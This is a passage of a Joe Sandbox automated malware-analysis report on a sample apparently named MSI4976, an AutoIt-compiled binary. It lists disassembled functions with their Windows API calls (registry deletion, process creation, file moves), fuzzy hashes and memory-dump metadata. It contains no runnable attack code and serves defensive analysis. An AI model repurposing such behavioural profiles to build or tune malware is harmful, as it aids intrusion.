                                        • Instruction Fuzzy Hash: E351B2A0D047D63DFB378724CC45BB6BEA96B07304F09C589E1E55A8C6D394EC98D760
                                        Function 003686AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        • Opcode ID: 612fabb5cd5f597d3e5268a6d76283124b780ea8b2bbcc9c504e5eeb34c7797f
                                        • Instruction ID: 57d1d0cef2ef403ea3474b870788144c3e0b4367f776ad062579db4ac66fc939
                                        • Opcode Fuzzy Hash: 612fabb5cd5f597d3e5268a6d76283124b780ea8b2bbcc9c504e5eeb34c7797f
                                        • Instruction Fuzzy Hash: 7F415E65C2121475CB12EBF4C886ACFB7ECAF09310F908966F514FB121EA70F65587E9
                                        Function 0038CB07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @U=u
                                        • API String ID: 0-2594219639
                                        • Opcode ID: 09de140c22c627c54527038fe67a1ff6f1adae5783635aa9c0ea5dd17fcf314b
                                        • Instruction ID: bddfd028e1bd05602ab272c0821f7eac99649145b25f69823cadb887f97c9a71
                                        • Opcode Fuzzy Hash: 09de140c22c627c54527038fe67a1ff6f1adae5783635aa9c0ea5dd17fcf314b
                                        • Instruction Fuzzy Hash: 2041E235910704ABD727EF38CC49FA9BB79EB0A320F165295F81AA72E1C7709D01D760
                                        Function 00383C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00383C92
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00383CBC
                                        • FreeLibrary.KERNEL32(00000000), ref: 00383D71
                                          • Part of subcall function 00383C63: RegCloseKey.ADVAPI32(?), ref: 00383CD9
                                          • Part of subcall function 00383C63: FreeLibrary.KERNEL32(?), ref: 00383D2B
                                          • Part of subcall function 00383C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00383D4E
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00383D16
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 395352322-0
                                        • Opcode ID: 5cf6d1f7c4b25e5aaa1bd07ffa6d4628cb5d0679ab0f03be573aafb9dd51c7a5
                                        • Instruction ID: cf562e1df427b75592c4f3b9c9845a12c6ac1b289bc35e979e602ec01d95ec7b
                                        • Opcode Fuzzy Hash: 5cf6d1f7c4b25e5aaa1bd07ffa6d4628cb5d0679ab0f03be573aafb9dd51c7a5
                                        • Instruction Fuzzy Hash: 2F311E71901209BFDB16EB94DC89EFFB7BCEF09700F1005AAE512E2251E6749F499B60
                                        Function 003616F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00361734
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036175A
                                        • SysAllocString.OLEAUT32(00000000), ref: 0036175D
                                        • SysAllocString.OLEAUT32(?), ref: 0036177B
                                        • SysFreeString.OLEAUT32(?), ref: 00361784
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 003617A9
                                        • SysAllocString.OLEAUT32(?), ref: 003617B7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 05ea472fc10363e5778b208b03e619424ae973260aa726d6da357af992abbb30
                                        • Instruction ID: 1b3465b5e8e1a7d3957e1ec791a1ce1fca2c67b876aea44a1f6c84cb0316f460
                                        • Opcode Fuzzy Hash: 05ea472fc10363e5778b208b03e619424ae973260aa726d6da357af992abbb30
                                        • Instruction Fuzzy Hash: CE217479600219AF9B119FA9CC88CFF77ECEB0A360B45C125F915DB254DB74EC418760
                                        Function 0035C600 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0035C684
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0035C697
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0035C6C7
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 458670788-2258501812
                                        • Opcode ID: 629efa9b7c04b4cfb74bdd8d19155e0463dc6da46947aa3ce6f1b412fd5f37f1
                                        • Instruction ID: 91aad97e87464e2a5926b0d3a7e7a1b62af7c35d1599b67ff00f2e09e0b3b5e8
                                        • Opcode Fuzzy Hash: 629efa9b7c04b4cfb74bdd8d19155e0463dc6da46947aa3ce6f1b412fd5f37f1
                                        • Instruction Fuzzy Hash: D021F371A00204BEDB0AAB64D886DFFB7ACDF06355B155119F822EB1F0DB785E0A9760
                                        Function 003669F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00366A2B
                                        • _wcscmp.LIBCMT ref: 00366A49
                                        • MoveFileW.KERNEL32(?,?), ref: 00366A62
                                          • Part of subcall function 00366D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00366DBA
                                          • Part of subcall function 00366D6D: GetLastError.KERNEL32 ref: 00366DC5
                                          • Part of subcall function 00366D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00366DD9
                                        • _wcscat.LIBCMT ref: 00366AA4
                                        • SHFileOperationW.SHELL32(?), ref: 00366B0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2323102230-1173974218
                                        • Opcode ID: 0ba60695bc04d3a265837045225e8e56e740478c11f8c0a7a6cb670688f505d4
                                        • Instruction ID: 0f68d951e44b1f00f843e93a99f8e3ab9f64a9d7ddb7396c04b4495d8885d5b5
                                        • Opcode Fuzzy Hash: 0ba60695bc04d3a265837045225e8e56e740478c11f8c0a7a6cb670688f505d4
                                        • Instruction Fuzzy Hash: A53148B18002186ACF52EFB4E845BDDB7B8AF08344F5085DAE505E7145EB359B89CF64
                                        Function 00362FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: c95306a619db45502acef1e78bcf345ee7c3a40fef2959b9979df3e07ec7d89a
                                        • Instruction ID: 8d24a1a3ed29bb65715c6003496df4c3f2e9f130f8cebcaf68550d53ad283c35
                                        • Opcode Fuzzy Hash: c95306a619db45502acef1e78bcf345ee7c3a40fef2959b9979df3e07ec7d89a
                                        • Instruction Fuzzy Hash: 8D213B32204A1176D237A6349C06FF773ECDF55300F51C025F9869F589EBA1AA86C395
                                        Function 003617C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036180D
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00361833
                                        • SysAllocString.OLEAUT32(00000000), ref: 00361836
                                        • SysAllocString.OLEAUT32 ref: 00361857
                                        • SysFreeString.OLEAUT32 ref: 00361860
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0036187A
                                        • SysAllocString.OLEAUT32(?), ref: 00361888
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 4415e344a5dbe1111398121f14ea552efed500f832a03b613fcd3300be488c41
                                        • Instruction ID: c5a7ca547898223f8e75eb5301ff283ab229867ae98e66491f474d233cb29b68
                                        • Opcode Fuzzy Hash: 4415e344a5dbe1111398121f14ea552efed500f832a03b613fcd3300be488c41
                                        • Instruction Fuzzy Hash: 3A218335600204AFDB169BB9CC88DBE77ECEF0E360B45C525F915DB6A4DA74EC418B60
                                        Function 0035E9B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0035E9CD
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035E9EA
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0035EA22
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0035EA48
                                        • _wcsstr.LIBCMT ref: 0035EA52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID: @U=u
                                        • API String ID: 3902887630-2594219639
                                        • Opcode ID: ad1b359b18a3f94ba969e010b38f9ad72d3491faf00e8789722bc4677fd109fc
                                        • Instruction ID: 8057d9976e2fce8b2df38c624f22cceb1810c1e606c7e586f83611dab0243a64
                                        • Opcode Fuzzy Hash: ad1b359b18a3f94ba969e010b38f9ad72d3491faf00e8789722bc4677fd109fc
                                        • Instruction Fuzzy Hash: 6A2107722042107AEB1B9B399C45E7BBBECDF45750F118029FC09CE0A1DA74DD409250
                                        Function 0035CA6D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035CA86
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CAB8
                                        • __itow.LIBCMT ref: 0035CAD0
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CAF6
                                        • __itow.LIBCMT ref: 0035CB07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID: @U=u
                                        • API String ID: 2983881199-2594219639
                                        • Opcode ID: 557b2a18e99296152a609034f116657591ec5062719e4a4e68a983175beeed7f
                                        • Instruction ID: 252fbf15a7890c626a87edf04af62afccb9dab271aa9bca079c145f75a96cf9e
                                        • Opcode Fuzzy Hash: 557b2a18e99296152a609034f116657591ec5062719e4a4e68a983175beeed7f
                                        • Instruction Fuzzy Hash: 9021D4726003147FDB23EA649C46EDE7AA9AF4AB55F011025FD05EB1A1D6B08D4983A0
                                        Function 0038A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0038A13B
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0038A148
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0038A153
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0038A162
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0038A16E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 388d40fd8f4b78e7d139dbeb2c0680b7b35a1a146eeb19d28fb96fcb1ae5c42c
                                        • Instruction ID: 239ac2f850d8129ebf6f05bc76880eac7cec753f9962f95af0d2d10563f91b28
                                        • Opcode Fuzzy Hash: 388d40fd8f4b78e7d139dbeb2c0680b7b35a1a146eeb19d28fb96fcb1ae5c42c
                                        • Instruction Fuzzy Hash: 971182B2150219BFFF169F65CC86EE77F5DEF08798F014215FA48A6090C6769C21DBA0
                                        Function 00344C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 00344C3E
                                          • Part of subcall function 003486B5: GetLastError.KERNEL32(?,00340127,003488A3,00344673,?,?,00340127,?,0032125D,00000058,?,?), ref: 003486B7
                                          • Part of subcall function 003486B5: __calloc_crt.LIBCMT ref: 003486D8
                                          • Part of subcall function 003486B5: GetCurrentThreadId.KERNEL32 ref: 00348701
                                          • Part of subcall function 003486B5: SetLastError.KERNEL32(00000000,00340127,003488A3,00344673,?,?,00340127,?,0032125D,00000058,?,?), ref: 00348719
                                        • CloseHandle.KERNEL32(?,?,00344C1D), ref: 00344C52
                                        • __freeptd.LIBCMT ref: 00344C59
                                        • RtlExitUserThread.NTDLL(00000000,?,00344C1D), ref: 00344C61
                                        • GetLastError.KERNEL32(?,?,00344C1D), ref: 00344C91
                                        • RtlExitUserThread.NTDLL(00000000,?,?,00344C1D), ref: 00344C98
                                        • __freefls@4.LIBCMT ref: 00344CB4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1445074172-0
                                        • Opcode ID: 75977dabdcc1496fa9a388acf8ae3103667c7db7a2e17650e82972c55bccbe3b
                                        • Instruction ID: 2d1297bf8501560dfe4624eb1b2f196146097c8173c93f75660a91bccef0450e
                                        • Opcode Fuzzy Hash: 75977dabdcc1496fa9a388acf8ae3103667c7db7a2e17650e82972c55bccbe3b
                                        • Instruction Fuzzy Hash: 9801D474401701AFC71BBB74D949A0D77E9EF05315B158528F509CF692EF34FC428A51
                                        Function 0038E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0038E14D
                                        • _memset.LIBCMT ref: 0038E15C
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
                                        • CloseHandle.KERNEL32 ref: 0038E19D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID: $?>$>>
                                        • API String ID: 3277943733-2737797800
                                        • Opcode ID: 44e03ca35c964d74235942858796a7951d1f1fc37b60989c08cc3f034a2e8130
                                        • Instruction ID: 273c663f53aac20f9500cdffbfbe50a98400e4e98261fcfac634a7045ab99336
                                        • Opcode Fuzzy Hash: 44e03ca35c964d74235942858796a7951d1f1fc37b60989c08cc3f034a2e8130
                                        • Instruction Fuzzy Hash: DDF054F2940350BEE6125766AC49FB77AACDB09354F000521FA04DE1D2D3B65E1187A4
                                        Function 0033C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0033C6C0
                                        • GetWindowRect.USER32(?,?), ref: 0033C701
                                        • ScreenToClient.USER32(?,000000FF), ref: 0033C729
                                        • GetClientRect.USER32(?,?), ref: 0033C856
                                        • GetWindowRect.USER32(?,?), ref: 0033C86F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
